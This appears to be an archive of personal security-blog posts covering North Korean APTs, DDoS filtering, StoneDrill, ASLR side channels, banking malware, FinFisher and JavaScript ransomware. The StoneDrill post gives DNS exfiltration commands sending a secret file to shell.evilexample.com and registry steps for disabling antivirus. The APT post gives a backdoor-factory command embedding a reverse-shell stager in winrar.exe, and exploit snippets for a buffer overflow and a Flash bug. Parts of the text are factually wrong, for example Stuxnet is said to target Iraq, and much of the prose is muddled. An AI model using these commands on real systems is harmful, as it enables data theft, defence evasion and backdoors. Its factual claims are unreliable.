Category Archives: Application Development

Vulnerabilities in the old OLE2-based HWP file format – engages APT attacks to South Korea

North Korea’s rising ambition seen in bid to breach global banks

My reflection on CNBC News (North Korea’s rising ambition seen in bid to breach global banks) and written down comments below:

Preface:

The overall situation looks extreme today no matter political or commercial. From commercial area, enterprise try to monopolize on market. From country to country, conflicts of interest in natural resources. My personal feeling was that the ownership of the non develop areas better belongs to natural instead of country. For sure that not only limit to Antarctica! Above description not intend to divert (side-track) your attention. Since the terms benefits or interest change the whole world. Yes,  human being go for survival, money is the key factor. And such away create the criminal activities and conflict of interest.

Electronic age made the overall situation more complex

Electronic age made the overall situation more complex especially banking industry. The evidence was told that that even though Mira DDOS, IOT Botnet and Zombie types of cyber attacks not causes banking industries lost the money in their drawer. However the insider threats especially trojan and malware which lets the finanical institution lost huge amount of money (For instance Bangladesh heist). Furthermore cyber espionage infiltrate activities most likely relies on malware and Trojan. The best example can quotes is the Stuxnet malware. The goal of Stuxnet intend to disturb the operations of nuclear facilities in Iraq.

From technical point of view, malware belongs to monitor (surveillance) and control of tool. The huge group of survillaince program must utilize malware as a infection media. Sounds like the APT (advanced persistent threat) is the descendants of the malware.

The term kill chain was originally used as a military concept related to the structure of an attack; … Since then, the “cyber kill chain” has been adopted by data security organizations to define stages of cyber-attacks (see below picture diagram)

Regarding to the definition of APT show on wikipedia . An APT usually targets either private organizations, states or both for business or political motives. APT processes require a high degree of covertness over a long period of time.  From criminal activities point of view, hacker most likely will collect the credential, personal details and database in the long run. For the criminal case like steal the money in electronic payment system, it is rare on APT type of attack.

Does APT equal to criminal activities in commercial world?

Observation – FBI stated that SONY INTRUSION and banking environment insider threats (banking malware) are the conspiracy of the North Korea government.

Why do we believe the perpetrator is North Korea?

The official statements from the FBI and US-CERT found the malware and disclose their md5 hashes for reference.

Dropper = d1c27ee7ce18675974edf42d4eea25c6
wiper = 760c35a80d758f032d02cf4db12d3e55
Web server = e1864a55d5ccb76af4bf7a0ae16279ba
Backdoor = e904bf93403c0fb08b9683a9e858c73e

Since the attack target of this malware exactly Microsoft windows platform. Base on definition of fair proof, I select and highlight Microsoft information details for reference.

Microsoft Backdoor:Win32/Escad.AA!dha

This threat can give a malicious hacker access and control of your PC. They can then perform a number of actions, including downloading other malware. But as usual Microsoft’s not intend to provides the suspicious source IP address list.

Remark: Per Norse Corp information, the malware was signed with a compromised Sony certificate.

The cyber defense solution provider found more details of this malware on Sep 2013. The malware activities looks came from Jilin Province Network and Liaoning Province Network. The security expert believed that the command & control may came from North Korea. Since Jilin and Liaoning provides the Internet services to North Korea. This malware so called Kimsuki malware.

Transformation – file type format convert weaponized File format

Vulnerabilities in the old OLE2-based HWP file format

What is an HWP file?

HWP documents are document files specialized in the Korean language and OLE2based document format similar to Microsoft’s 97-2003 Microsoft document. The file format created by the South Korean company Hancom. HWP files are similar to MS Word’s DOCX files, except that they can contain Korean written language, making it one of the standard document formats used by the South Korean government.

Design weakness of HWP files:

Para text is a data record type that stores the content of each paragraph in body text. When parsing a para text tag within an .hwpx file, a logic error in hwpapp.dll results in a type confusion scenario. When paired with an appropriate heap spray, this vulnerability can affect code execution.

Remark: In computer security, heap spraying is a technique used in exploits to facilitate arbitrary code execution. The part of the source code of an exploit that implements this technique is called a heap spray. In general, code that sprays the heap attempts to put a certain sequence of bytes at a predetermined location in the memory of a target process by having it allocate (large) blocks on the process’s heap and fill the bytes in these blocks with the right values.

2013 – Kimsuki malware design objective(OLE2-based HWP file format + APT) : Targets Critical Infrastructures and Industrial Control Systems (ICS)

2016 – Onion Dog, APT Focused On the Energy and Transportation Industries in Korean-language Countries

OnionDog malware is transmitted by taking advantage of the vulnerability of the popular office software Hangul in Korean-language countries, and it attacked network-isolated targets through a USB Worm. OnionDog APT targets Critical Infrastructures and Industrial Control Systems (ICS)

Overall comment:

Since North Korea ruler as a dictator control their country. Developing nuclear bomb,  test the missile looks show his power to the world. From psychological point of view, it is easy to understand his goal to enagaged APT attack. Since the dictator would like to emulate his imaginary enemy (USA) to destroy the nuclear power energy facilities from his enemy. However I remain to reserve my opinion that he is the lord behind the seen to engage the banking malware attack in foreign country except south Korea?

Reference to Korea CSIS report:

  1. 2011 – Denial-of-service(DDoS)attacks on websites, the first major cyber-attack attributed to North Korea was on April 12, 2011, which paralyzed online banking and credit card services of Nonghyup Agricultural Bank for its 30 million customers.
  2. 2013 – Advanced persistent threat campaigns, and employment of less sophisticated but sufficiently effective malware such as the Jokra wiper tool observed on March 20, 2013. South Korean media reports that North Korea has started to target smartphones as well.

For more detail, please refer to below url for reference.

What Do We Know About Past North Korean Cyber Attacks and T heir Capabilities ?

 

DDOS never expire! A powerful tool for political and economic weapon (Part 1)

We heard DDOS term till 80’s. The foundation of attack given from network layer (OSI layer 3) till today application layer (OSI layer 7). Since 2010 a mobile computing trend leads BYOD (Bring your own device) terminology and carry out more serious distribution denial of services. A public DNS incident occured last year (2016) exposed IoT type style distribution denial of services. If you still remember , security expert forseen that ransomware  is going to replace DDOS soon. It looks that the statement not totally correct.  The truth is that cyber arsenal virtually categorizes the weapons into different categories (see below).

Denial of IT Services categories Source of attack Technical (Naming convention) Destination of attack Benefits of attacker Side Effect
End user computing
1. DDOS (SYN Flood)
2. DOS (SYN Flood)
Network layer (OSI layer 3) Prestige and Glory Bring disruption to satisfy objective (not limit to economic, might involves political reason)
End user computing 1. DDOS (UDP Flood)
2. DOS (UDP Flood)
Network layer (OSI layer 3) Prestige and Glory Bring disruption to satisfy objective (not limit to economic, might involves political reason)
End user computing 1. DDOS (ICMP Flood)
2. DOS (ICMP Flood)
Network layer (OSI layer 3) Prestige and Glory Bring disruption to satisfy objective (not limit to economic, might involves political reason)
End user computing 1. DDOS attack focused on Web applications vulnerabilities
2. DOS attack focused on Web applications vulnerabilities
Application layer (OSI layer 7) Prestige and Glory Bring disruption to satisfy objective (not limit to economic, might involves political reason)
End user computing 1. DDOS attack focused on Operating system vulnerabilities
2. DOS attack focused on Operating system vulnerabilities
Application layer (OSI layer 7) Prestige and Glory Bring disruption to satisfy objective (not limit to economic, might involves political reason)
Compromised web site, email phishing attached with file or url embedded malicious code Application layer (files and OS) – Attack trigger by ransomware which cause files lock (encrypted) 1. Operating system and files
2. End user computing
Bitcoin (money) Bring disruption to satisfy objective (focus on business world instead of political reasons)

Information supplement (BYOD and IoT)

Denial of IT Services categories Source of attack Technical (Naming convention) Destination of attack Benefits of attacker Side Effect
BYOD (mobile phones) Botnet – so called vampire cyber soldier Both network and application layer (OSI 3 & 7) Prestige and Glory Bring disruption to satisfy objective (not limit to economic, might involves political reason)
IoT (Internet of things includes, web cam, car automation, home appliance, Smart TV and smart electronics device) IoT (Botnet) – so called descendant of vampire cyber soldier Both network and application layer (OSI 3 & 7) Prestige and Glory Bring disruption to satisfy objective (not limit to economic, might involves political reason)

Yes, this topic might bring interests to reader. Ok, let’s join together to this journey (DDOS never expire – A powerful political and economic weapon (Part 1)).

Is there a way to identify attacker traffics? Yes, it can but it seems out of control now! BYOD and IoT technology are the accomplice!

As far as we know, the earlier stage of DDOS and DOS attack keen to make use of random source to increase the difficulties of the defense. A technical term so called Random Spoofed Source Address Distributed Denial of Service Attack (RSSA-DDOS)

Let recall different types of avoidance mechanism to avoid classic DDOS. There are total 3 types of filter can avoid classic DDOS happened on network layer.  For more details, please see below:

  1. Ingress filtering
  2. Egress filtering
  3. Router-based filtering

However above 3 types of prevention mechanisms not able to avoidance of RSSA-DDOS. The drawback is that those solution encounter difficulties to distinguish between legitimate traffic and attack traffic in effective way.

Dawn appears only for short time (FSAD & ECBF)

Filtering based on the source address distributed feature – FSAD

Solution:

  1. Detection of attack occurred and according to the current attack scale, historical flow and source address recognition accuracy requirements. Set the appropriate legal address identification
    parameter.
  2. 2. Identify the legal source address and saved to the legal address table (LAT)

But how to identify the counterfeit source IP address

A solution named “The Extended Counting Bloom Filter -ECBF” can do the magic.
Example:
Assuming that a packet is received, the source address Saddr is (a.b.c.d) > 1.1.1.1
The source address Saddr is (a.b.c.d), then

• IPH(Saddr)=256×a+b;
• IPM(Saddr)=256×b+c;
• IPL (Saddr)=256×c+d;
• IPLH(Saddr)=256×d+a.

The ECBF contains four hash codes for counting the number of source address packets number and array. Each array corresponds to a hash function (see below)

It is easy to see that each element of the ECBF corresponds to 2 16 source addresses. For example, the 257th cell of the A 1 array corresponds to the source address (1.1.x.y)
According to the packet, where x and y are any number between 0 and 255. And each time a packet is received, the four cell values corresponding to the packet source address
Then add 1 for A 1 [256 × a + b], A 2 [256 × b + c], A 3 [256 × c + d] and A 4 [256 × d + a], respectively.
 See below diagram will receive a high-level understanding.
Legitimate address identifying algorithm under random spoofed source address DDoS attacks (see below):
Set identifying time interval and threshold T;
while(1)
Receive a packet;
Get source ip address sip;
Record sip in ecbf;
If (every element’s value of sip in 4 arrays>T)
Sip is a legitimate address;
fi;
if (time interval is over)
Empty 4 arrays;
Start a new time interval;
fi;
End while;
 IoT Botnet appears then triggers DDOS make the Cyber world crazy!
Above filter base defense mechanism and integrity identification method looks insufficient when IoT Botnet join to cyber war. Recently headline news stated that Mirai botnet turning internet of things into botnet of things. See how serious of this attack effected cyber world!
Mirai botnet on volume amount basis break through advanced defense mechanism. It look likes a cyber soldiers listen to the instruction of C&C server to attack the enemy. As a matter of fact, the cyber incident historical record last year proven that above imagination not a assumption. This is a real story.
References:
Oct 2016 – Dyn cyberattack: the attack involved “10s of millions of IP addresses (DDOS suspects – Mirai)
2016 – A massive DDoS cyber attack that disabled many online sites during the American presidential election (DDOS suspects – unknown)
2017 – The citizens of Hong Kong looking for True, Fair & Free Election, however the democratic websites operate in frequently encountered DDOS during important events (DDOS suspects – unknown)
Above 3 items of incident can tell us DDOS attack never expire. Sounds like the attack is under transformation. DDOS attack from begin focus on commercial world expands to other non commercial area. The attacks methodology enhance by internet of things and become powerful. The additional target added foreign government and democratic world.

 

Since this discussion overtime and looks bulky. Let’s continue our discussion on Part 2 next time (DDOS never expire! A powerful tool for political and economic weapon). Stayed tuned.

 

 

 

 

 

 

 

 

 

Imaginations – a phantom command DNS queries activated Stone Drill attack in Saudi

Patrick Jane is a fictional character and the protagonist of the CBS crime drama The Mentalist, Jane is an independent consultant. It looks that sound likes you can me in Cyber world. Ha Ha.  The most interested Cyber security topics past two days is the destructive malware dubbed StoneDrill. Since the incident happened end of last year (2016). But this news allowed to expose to the world few days ago! The Famous antivirus vendor (Kaspersky Lab) analysis all the incident details and provides the detective control to the world. In our view point, all the information can research on internet. But the difficult ways is what is the infection technique on this incident. I believed that security expertise likes Kaspersky Lab and FireEye know more information but it can’t release to public.  Since we are in the discussion forum. There is no harm to become a actor in this moment. Ok, my friends. We are now Patrick Jane. Let’s to start the journey.

Shamoon 2.0 and StoneDrill background:

Shamoon 2.0 and StoneDrill are developed by different hacker groups. The finger print ( keyboard layout and the ID) found in the malware source code look likes a proof of identification. For Shamon 2.0 , Yemen language set was found  (ID: 9217 i.e.Arabic -Yemen [ar] (ar-ye)). But the StoneDrill embeds mostly Persian resource language.

Common attack target criteria:

Platform: Most likely is a Microsoft Window OS of machines.

Victim: Targeting oil and gas companies in the Middle East and also aiming towards targets in Europe, Kaspersky said.

Imaginations  – How malware fool the oil and gas company defense mechanism.

We assumed that both oil and gas company install antivirus program , Malware detector and end point content filtering (Websense and Bluecoat). But how come to let attacker implant malware to the hosts?

Hint 1:

Found PowerShell activities (Shamoon 2)

Hint 2:

Since the usage of powershell in windows OS platform is common today. Powershell looks like a accomplice.There are a lot of ways to avoid detection.

Methodology A:

DNS queries received powershell command. A unique attack called DNSMessenger uses DNS queries to carry out malicious PowerShell commands on compromised computers. The function likes RAT. This

File transfer via DNS

1. convert the file to be transferred via tshark into a hex stream.
Command - (xxd -p secret > file.hex)

2. Read each line from file.hex, and "transmit" it as a DNS query.
Command - (for b in `cat file.hex `; do dig $b.shell.evilexample.com; done)

3. On the DNS server, we can capture the messages via tcpdump or the query log.
Command - (tcdpump -w /tmp/dns -s0 port 53 and host system.example.com)

4. Extract the messages from the packet capture
Command - (tcpdump -r dnsdemo -n | grep shell.evilexample.com | cut -f9 -d' ' | cut -f1 -d'.' | uniq > received.txt)

5. Reverse the hex encoding
Command: (xxd -r -p < receivedu.txt > keys.pgp)

Done. Hey man, File transfer via DNS you are done! 


Methodology B:

Disable Anti-Virus via Debugger Setting

1. Run regedit.exe
2. Go to HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Options
3. Create a new key (example: calc.exe)
4. Create a new string value under your exe. The name of the string value is ‘Debugger’, and the value is svchost.exe (or anything)


Seems our Patrick Jane life stop here! Ha Ha, it is interesting, right? It looks that more technique can be used today to fool the defense mechanism. As said, this is only my imagination, it is a concept. A virtual scenario replay to detect what is the possible way on this malware incident. Ok, see you!

 

He is great partner of virtual machine but he can kill VM simultaneously – address space layout randomization

 

 

 

The trend in IT world running into virtual world nowadays. Even though your mobile phone operation system is run on top of virtual machine. The memory resources utilization from tradition static to dynamic since virtual machine architecture founded. Security experts worries about infiltration of malware on virtual machine. A mitigation step introduce on VMware since 2014. The system designer conducted a technology alleged address space layout randomization. As a result it avoid malware implant to kernel since no living place for the malware alive (see below – a statement on technical article point out that how ASLR bring in the value)

The VMware ESXi kernel uses an address space layout randomization (ASLR) methodology to provide random and unpredictable addresses for user-mode applications, drivers, libraries and other executable components. This is a significant security benefit because of the way ASLR thwarts malware looking to take advantage of memory-based exploits. The malware would not have a known address to use as a vector for the exploit because of the randomization.

As times goes by, ASLR not even is the assistance of virtual machine designer. On the other hand, he will become a killer to kill his master. But this fact is not a news today. Regarding to the technology expertise experimental studies, it is possible to execute a attack on kernel side through malicious Java application. The method is a kind of side-channel attack (side-channel attacks) and based on the definition of indirect addresses to which had previously been handling when traversing page tables memory processor unit MMU (Memory Management Unit) in the translation of virtual memory addresses to physical memory addresses. Since cache CPU general and it is recognized as an active application or activity the MMU, then by evaluating differences in data access time before and after resetting the cache (the attack variety “EVICT + TIME”) can with high probability to choose the address and able to detect the locations since it is under the operation of memory management unit.

By breaking ASLR, an attacker will know where code executes, and prepare an attack that targets the same area of the memory, stealing sensitive information stored in the computer’s memory.

The vulnerability channel found on web browser announced by Professor of Computer Science at Cornell Tech on Jan 2016.

When attacking browsers, may be able to insert arbitrary objects into the victim’s heap. Let’s focus on web browser design fundamental.

Web applications communicate with each other through system calls to the browser kernel. As we know, web applications exist in separate processes owned by the browser kernel, they are prohibited from communicating with each other, except through the browser kernel.

 

However Plugins are less reliable than browsers.

However Plugins are less reliable than browsers

 

As a matter of fact, Java script is the helper of ASLR vulnerability. Sounds like java-script is an accomplice. The murderer is plug in application.

But in which situation virtual machine will be compromise of this vulnerability?

From technical point of view hacker engage a cyber attack targets workplace on memory area we understood that it is a malware form style attack.  As we know, AMD architecture define a feature named SVM instruction set.  AMD virtualization technology, codenamed “Pacifica,” introduces several new instructions and modifies several existing instructions to facilitate the implementation of VMM systems.
The SVM instruction set includes instructions to:

Start execution of a guest (VMRUN)
Save and restore subsets of processor state (VMSAVE,VMLOAD)
Allow guests to explicitly communicate with the VMM (VMMCALL)
Set and clear the global interrupt flag (STGI, CLGI)
Invalidate TLB entries in a specified ASID (INVLPGA)
Read and write CR8 in all processor modes
Secure init and control transfer with attestation (SKINIT)

Remark: Fundamentally, VMMs (Hypervisor) work by intercepting and emulating in a safe manner sensitive operations in the guest (such as changing the page tables, which could give a guest access to memory it is not allowed to access).

 

As such,  you are more free to run on memory address space once AMD-V is enabled in the BIOS (or by the host OS).

Remark: (VERR_SVM_ENABLED)

Below confirmed CVEs looks headaches to virtual machine core designers (VMWARE, VBOX, Hyper-V), right?

  • CVE-2017-5925 for Intel processors
  • CVE-2017-5926 for AMD processors
  • CVE-2017-5927 for ARM processors
  • CVE-2017-5928 for a timing issue affecting multiple browsers

Since founded AnC attack (EVICT+TIME), it  can detect which locations in the page table pages are accessed during a page table walk performed by the MMU.  In the sense that it such a way broken the ASLR feature on virtual machine. The objective of ASLR mainly avoid malware infection on virtual machine. What scenario we can foreseen tomorrow!

Sample: Java code with execute arbitrary memory write

// prepare buffer with address we want to write to
ptrBuf = ""
// fill buffer: length = relative ptr address - buffer start + ptr offset
while (ptrBuf.length < (0x????? - 0x9????? + 0xC)){ptrBuf += "A"}
ptrBuf += addr

// overflow buffer and overwrite the pointer value after buffer
obj.SetText(ptrBuf,0,0)

// use overwritten pointer to conduct memory write of 4 bytes
obj.SetFontName("\xbe\xba\xfe\xca") 

// WHAT TO WRITE
alert("Check after write:0x???????? + 0x?

 

 

 

 

 

Mobile Financial App inflicts more contradiction on cyber security – part 1

When you pick up your mobile phone daily, no one will be care of your data privacy in highest priority. Since you are busy with your social media apps (Whatapps, Facebook, Instagram..etc). As easy as today make a payment on air through your mobile phone. However, your habit forming behavior might cause inherent secuirty risks silently. Yes, this is not a hot news. My friend believed that his phone is secure since he installed anti-virus program. As easy as today make a payment on air through your mobile phone. However, your habit forming behavior might cause inherent secuirty risks silently. May be you feel that it is not a critical issue once anti-virus program installed. From technical point of view, it looks correct because anti-virus will monitor malicious activities and quarantine the suspicious activities.

As a general user point of view, we all trusted the mobile financial apps issued by Bank. Do you think it was enough that install a virus protection software and do the mobile patch management. It will resolve all the problems. Regarding to this question, below table can provide an overall idea in this regard. It looks that some component had their own fundamental design limitation.

Compare with traditional non visualization computer architecture, smart-phone memory resources usage brings security concerns to subject matter expert. Apart from this, MIDP (mobile information device profile) carry out trusted relationship concerns of mobile phone applications.

It looks that tons of security concerns carry out on mobile finance software application. But what is the factors let financial institution keep going to this path but don’t take a U turn?

This questions looks everybody can answer? We are living on the earth and it is a demanding atmosphere. The traditional retail banking environment can’t survival on traditional banking product. Besides, labor cost, shop rental fees are count in bankers mind. The bankers think e-business can give assistance. And therefore a electonic technology similar as flooding to change the traditional world was born.

Information security value?

A joke told us that business man did not have key term information security in their mind until tragedy happen. As times goes by, mobile banking technology become a main trend today. Even though a small shop in village from China also accept mobile payment. But what is the value of information security no one can answer today especially bankers! Because if someone put information security on top priority means the efficiency of business developement will slow down. But who have guts to carry this burden ask the management board return to twenty years ago technology?

What is the possibility or hit rate on malware infect mobile phone?

A technology term bring your own device (BYOD) means you are the owner of the device. If an cyber incident occurs on your phone, it is really a sophisticate scenario. As we know, mobile phone system architecture operate on top of virtual machine environment. For sure that the web browsing activities on your mobile phone more intensive compare to your home workstation. Since it is a mobile device, your mobile phone will able to access mobile hot spots anywhere. It increase the attack surface for hackers execute the attack.

What if your mobile phone infected by malware? Do you think it will harmful to bank system?

If you are my follower, do you remember that we had discussion on malware infection technique last year. A critical malware incident occured in U.S. weapons manufacturer Lockheed Martin Corp on 2011. Hackers infiltrated to their internal network.This incident driven Lockheed Martin develop kill chain framework. The goal of this framework is going to defense malware activities. Below table is the famous framework of Lockheed Martin Kill Chain.

Refer to above table, disrupt the malware infection process need deny in delivery phase. However the local anti-virus install on mobile phone do not have such capabilities. The mobile finance application provides flexibility to client. But it was not secure!

Under this context, can we say online banking will be secure than mobile finance apps install on mobile phone? As a matter of fact, a mobile finance applications install on mobile phone exploits programming syntax once phone compromised by hacker. It such a way assists hacker understand the finance institution back end process. Compare with online banking system, bank customers may vulnerable to man-in-the-middle causes privacy leakage. However the overall risk rating lower than mobile finance application software. At least hacker may have difficulties infiltrate to back-end system.

Cyber Crime Business Is Still Booming, especially Targeted attack trends. It is hard to tell what is the functionality on mobile finance application software in future. May become a electronic wallet. Since a design weakness has been known, who is the appropriate guy to metigate the on going strategy in future?

It is a long story, let’s discuss later!

 

 

(Banking Environment) Advanced technology – brings of concerns for cyber security!

Electronic payment one of the major term of in our daily life. It is hard to imagine that what’s the result once without credit card payment, online payment transfer and mobile payment in the world! The cyber attack hits financial institution more frequently and rapidly especially malware. In this discussion, we are going to investigate modern technology on electronic business bring the impact on financial institution in the long run.  The mainframe computer bring a secure environment to IT world since it operate on a proprietary operation system (z-OS), well defined system architecture (trusted kernel OS). You never heard that a zero-day vulnerability encounters on MainFrame OS or application weekly. As times goes by, the over demanding business activities in the world transfer the motivation equivalent push a secure technology concepts to the cliff side.

Can we say Java technology is the instigator?

The MainFrame system designer did not have hiccups of their system design since the isolation level of memory and operating system coding not as easy as jailbreak a iPhone iOS or windows OS system. However a security weakness of the system feature might bring an unforeseen tragedy to their environment.

Java for OS/390 creates java bytecodes which are not directly executable OS/390 instructions.

However a indirect way may possible lets Logical partitions (LPARs) become vulnerable.

Why?

The combination of buffer overflow and heap spraying is the most common exploitation of pdf malware. How mainframe generate pdf format of file driven by cobol programming language. FPDF is a PHP class which allows to generate PDF files with pure PHP, that is to say without using the PDFlib library. But what is the inherit potential vulnerability of Java. The Java API for JSON Processing provides portable APIs to parse, generate and transform.The COBOL application populates the CRD and passes it to the generation subroutine (RCJSNGEN) with the CRD source in a CALL statement. RCJSNGEN then converts the COBOL data to JSON objects and returns the top level JSON object to the application. Even though cobol program module not vulnerable. But 2 items of high risk application run on top of mainframe Logical partitions (LPARs).

But reminds reader that Java for OS/390 creates java bytecodes which are not directly executable OS/390 instructions. Can we say OS/390 can avoid ring zero attack absolutely?

Ok, let take a closer look of Z-OS system architecture.

 

  1. User address spaces are unique and run single applications
  • Multiple units of work can be active within the address space (parallel execution)
  • User address spaces do not communicate with each other
  • If one address space fails the other user address spaces continuous to run

2. System address spaces

  • Execute system components (elements) – DB2, CICS, SMF, DFMS. These components are call subsystems.
  • System components communicate with each other

3. Cloned or Duplicate address spaces running as a subsystem communicate with each other

  • Multiple address spaces of a subsystem and as a component act as one
  • If one address space fails, the components communicate with each other

Refer above 3 items, 3 types of memory address looks no direct communication with core OS since they are defined as a subsystem. But what is actual status of hardware DMA memory address resources sharing. For example, FICON to access local storage, network adapter (Ethernet and SDLC). And therefore it is hard to say that modernized mainframe environment as secure as classic mainframe system.

Electronic types of Bank Robbery

The Extensions for Financial Services (XFS) system accidentally driven of finance lost in banking industry. The XFS function is responsible for mapping the API (WFS…) functions to SPI (WFP…) functions, and calling the appropriate vendor-specific service providers. As a matter of fact, the Extensions for Financial Services (XFS) system causes financial lost looks serious than traditional bank robbery case. For instance ATM malware incident or 2016 Bangladesh Bank heist. The total of amount of financial lost are huge. From humanity point of view, feeling of optimism since such financial lost incidents did not injure human life. However it is more difficult to fight with technology crime compare with traditional crime.

Reference:

The Phantom of the payment (SWIFT) – A new system flaw found by Microsoft this week. Is there any relationship?

The APAC countries audience might voted “The Phantom of the Opera” is the famous opera, right? I familiar with the song, The Phantom of the Opera is there. Inside my mind. …..Yes, regarding to the subject matter, I digress.The payment flaw incidents happened this year looks didn’t have appropriate resolution to resolve. “To share attack intelligence … SWIFT first needs more hacked banks to come clean.” Brussels-based SWIFT announced the launch of the new team on July 11 as part of a customer security program unveiled by CEO in May. The program was a reaction to persistent security criticism leveled at SWIFT in the wake of the $81 million heist from Bangladesh Bank earlier this year. Read a lot of technical articles and analytic reports receive the understanding of the security weakness of the core system.  I am not going to mention too much in this area because you can easily found the related informations on internet. But the payment flaw security incident especially incident happened in Bangladesh bank.  As a matter of fact, it bring to our attention that the weakness of end user computing and IT infrastructure let this nightmare occurred. Why do we recall this system flaw again? New issued by Microsoft yesterday, a vulnerability occurs on windows OS system. Yes, we don’t surprise on zero-day weekly. However this vulnerability bring to my attention once again!  How importance of end user computing was?

Microsoft found the following:

An attacker could exploit the flaw by conducting a man-in-the-middle attack on a system or print server and injecting malicious code. That’s possible because the print spooler service doesn’t properly validate print drivers when installing a printer.

The conclusion told that rootkit or malware can relies on this way jump inside windows OS system in silent mode because the print spooler service doesn’t properly validate print drivers! It sounds horrible, right?

My personal opinion is that end user computing is the major factor in nowadays IT world regardless of which types of system. I did penetration test on SWIFTNET in 2010 and couldn’t found any critical flaw on SWIFTNET. At that time mistake to believe that modern defence mechanism can fight with insider threats. Seems the stories happened can tell.

In the meantime, I strongly believed that the weakness of system (SWIFT) not the major factor causes serious cyber security incident and fraudulent payments. The initial instigator is the end user computing. Let’s keep our eye open and see whether it is true or not.

Reference articles refer below URLs:

Swift Hack Probe Expands to Up to a Dozen Banks Beyond Bangladesh

http://www.bloomberg.com/news/articles/2016-05-26/swift-hack-probe-expands-to-up-to-dozen-banks-beyond-bangladesh

SWIFT CEO warns: Expect more hacking attacks

http://timesofindia.indiatimes.com/tech/tech-news/SWIFT-CEO-warns-Expect-more-hacking-attacks-/articleshow/52583643.cms?

Every version of Windows hit by “critical” security flaw

http://www.zdnet.com/article/every-version-of-windows-hit-by-critical-security-flaw/

ATM thieves are all in jail. Can you tell me that bank ATM environments are safe now?

A wide range of views (Advanced persistent threat)

We heard a technical terms named advanced persistent threat since 2013. An information which announced by cyber security company (kaspersky, FireEye, Symantec….etc) but not acknowledge by instigator . The story looks amazing that a security consulting firm (Mandiant) fooled by hacker. By coincidence, it found malicious finger print on gmail account and email message contained alleged resources came from China during investigation. This incident lets people in the world believe that cyber war will be happen in between country to country. A technical vocabulary so called Advanced Persistent Threat spreads around the world.

An unauthorized person gains access to a network and stays there undetected for a long period of time. Cyber security terminology so called APT attack. APT style attack confused security experts. Their mechanism contains many shadow nodes. The shadow nodes located in different areas and countries. It can take this advantage and convert as political tool. It is a sword. Careerist can blame another country that they are dishonest using internet. Who’s cast a unrighted wrong, believed that above diagram can provide an idea to you in this regard.

Reference: – Unofficial information which did not acknowledge by instigator

APT 1: cyber espionage group based in China – Discovered on Feb 2013

APT 28: Russia’s Cyber Espionage Operations – Discovered on Oct 2014

whistle blower (Snowden) – surveillance program scandal ( PRISM ) – Discover on Jan 2014

The design objective of Advanced persistent threat:

Enabled espionage using a variety of intelligence gathering techniques to access sensitive information.

Government enforcement official tools

i. Da Vinci and Galileo

Made by the Italian company Hacking Team, use to Hijack Phones for covert collection of emails, text messages, call history and address books, and they can be used to log keystrokes and obtain search history data.

Remark: An Official announcement in 2015 near year end, Da Vinci products not going to export to other countries due to data leakage incident happened on their campus.

ii. FinFisher (Neodymium & Promethium)

Specific users targeted in Europe and Turkey (last update on Dec 2016)

Neodymium uses the W32/Wingbird.A!dha backdoor to spy on users.

Promethium is a a “backdoor” program, it is a malware. He will masquerades as popular Windows tools such as WinUtils, TrueCrypt, WinRAR and SanDisk.

Remark: CVE-2016-4117 confusion code bug in Adobe Flash equivalent a instigator with Neodymium and Promethium. The Adobe Flash bug allow corrupt one of the objects to extend its length to 0xffffffff (see below source code) and its data buffer to address 0. The attacker are allow to access all of the user space memory once ByteArray corrupted. And such a way attacker execute embedded shellcode. If the Flash Player version is older than 21.0.0.196, the attack can’t execute.

public static function flash20(ba:Dtaa3, var4:uint, var5:uint)
{
   var len:uint;
   var flash50:uint;
   try
   {
       flash38 = true;
       flash21 = ba;
       len = ba.length;
       flash50 = (ba.a1 ^ ba.a5);
       ba.a2 = 0xFFFFFFFF;
       ba.a6 = (0XFFFFFFFF ^ flash50);
       ba.endian = Endian.LITTLE_ENDIAN;
       flash39 = var5;
       len = ba.length;
       if (len !=0xFFFFFFFF)
       {
           flash3("");
       };
       if (flash72)
       {
           Play3.flash20(); // Win32.Exec()
        }
       else
       {
           flash1("");
        };
        flash34(var5, var4);
        }

Advanced Persistent Threat – Drawback of remote monitoring

Traditional Lawful Interception solutions face new challenges which highlight by Finfisher (see below)

  • Data not transmitted over any network
  • Encrypted Communications
  • Targets in foreign countries

Finfisher resolution:

FinSpy was installed on several computer systems inside internet Cafes in critical areas in order to monitor them for suspicious activity, especially Skype communications to foreign individuals. Using the Webcam, pictures of the targets were taken while they were using the system

Traditional tactical or strategic Interception solutions face challenges which point out by Finfisher (see below):

  • Data not transmitted over any network and kept on the device
  • Encrypted Communications in the Air-Interface, which
  • avoid the usage of tactical active or passive Off-Air Systems
  • End-to-end encryption from the device such as Messengers,
  • Emails or PIN messages

Finfisher resolution:

FinSpy Mobile was deployed on BlackBerry mobile phones of several Targets to monitor all communications, including SMS/MMS, Email and BlackBerry Messenger.

The official spy tools looks powerful, however there is another sniff technique which available in the IT world.

Implant backdoor example:

Not going to teach how to hack the system but it is a better understanding …………..

This session not going to get in touch with FinFisher backdoor. However few available solution in the market guide you implant a backdoor to Winrar.exe. One of the example display as below:

sudo backdoor-factory -f /home/assault/Downloads/winrar.exe -s iat_reverse_tcp_stager_threaded -H 192.168.50.15 -P 8080

Government enforcement agency looks not difficult to expand the APT area of coverage. A lot of time they are relies on phishing.

Concept wise equivalent to government enforcement tool

The objective of the APT intend to collect sensitive data or voice messages during surveillance program process. And therefore the compatibility of the malware become an important factor. We are not a government agency but we can run a test with similar concept of design.

Phishing with Empire – Empire software supports macOS, Linux, and Windows hosts from one listener. The only requirement is that you need find a Command and Control (C2) work with you.

Summary:

The key words advanced persistence threat sound scary however it is only a surveillance program. As a normal citizen I do not believe foreign country have interest on my telephone conversation. From data privacy, it looks that it contained grey area since we do not know the reason why we are under surveillance. Such action let people nervous. However my expectation on these technology is that it must expand to some area in the city which take care the monitor and control of criminal activities. What do you think?

Infamous ransomware – another new generation was driven by JavaScript!

 

 

Have you heard the name evil? Seems this naming convention is apply to ransomware now. A simple hierarchic design of ransomware which work with Java script was born in 2017. The evil ransomware was written in 100% JavaScript. There is no visible panel used for decryption.

The designer of Evil (ransomware) looks familiar with forensic investigation. His design first approach to execute the task is going to delete all the executable file from the following folder.

  1. It delete all executable files from the (folder% TEMP% and% APPDATA% \ Microsoft \ Windows \ Start Menu \ Programs \ Startup) once (evil) javascript (file0locked.js) execute by wscript.exe.
